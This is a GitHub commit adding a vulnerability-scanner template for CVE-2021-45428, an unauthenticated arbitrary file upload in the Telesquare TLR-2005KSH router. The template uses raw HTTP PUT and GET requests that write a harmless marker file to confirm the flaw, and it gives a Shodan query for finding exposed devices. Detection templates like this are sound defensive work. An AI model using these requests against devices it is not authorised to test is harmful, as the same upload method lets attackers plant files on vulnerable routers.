Merge pull request #4446 from gy741/rule-add-v111

Create CVE-2021-45428.yaml
patch-1
Prince Chaddha 2022-05-20 00:54:46 +05:30 committed by GitHub
commit be5b6338bf
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 48 additions and 0 deletions

View File

@ -0,0 +1,48 @@
id: CVE-2021-45428
info:
name: Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Upload
author: gy741
severity: critical
description: |
TLR-2005KSH is affected by an incorrect access control vulnerability. THe PUT method is enabled so an attacker can upload arbitrary files including HTML and CGI formats.
reference:
- https://drive.google.com/file/d/1wM1SPOfB9mH2SES7cAmlysuI9fOpFB3F/view?usp=sharing
- http://packetstormsecurity.com/files/167101/TLR-2005KSH-Arbitrary-File-Upload.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-45428
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-45428
cwe-id: CWE-639
metadata:
verified: true
shodan-query: http.html:"TLR-2005KSH"
tags: cve,cve2021,telesquare,intrusive,fileupload
requests:
- raw:
- |
GET /{{randstr}}.txt HTTP/1.1
Host: {{Hostname}}
- |
PUT /{{randstr}}.txt HTTP/1.1
Host: {{Hostname}}
CVE-2021-45428
- |
GET /{{randstr}}.txt HTTP/1.1
Host: {{Hostname}}
req-condition: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'status_code_1 == 404 && status_code_2 == 201'
- 'contains(body_3, "CVE-2021-45428") && status_code_3 == 200'
condition: and
# Enhanced by mp on 2022/05/19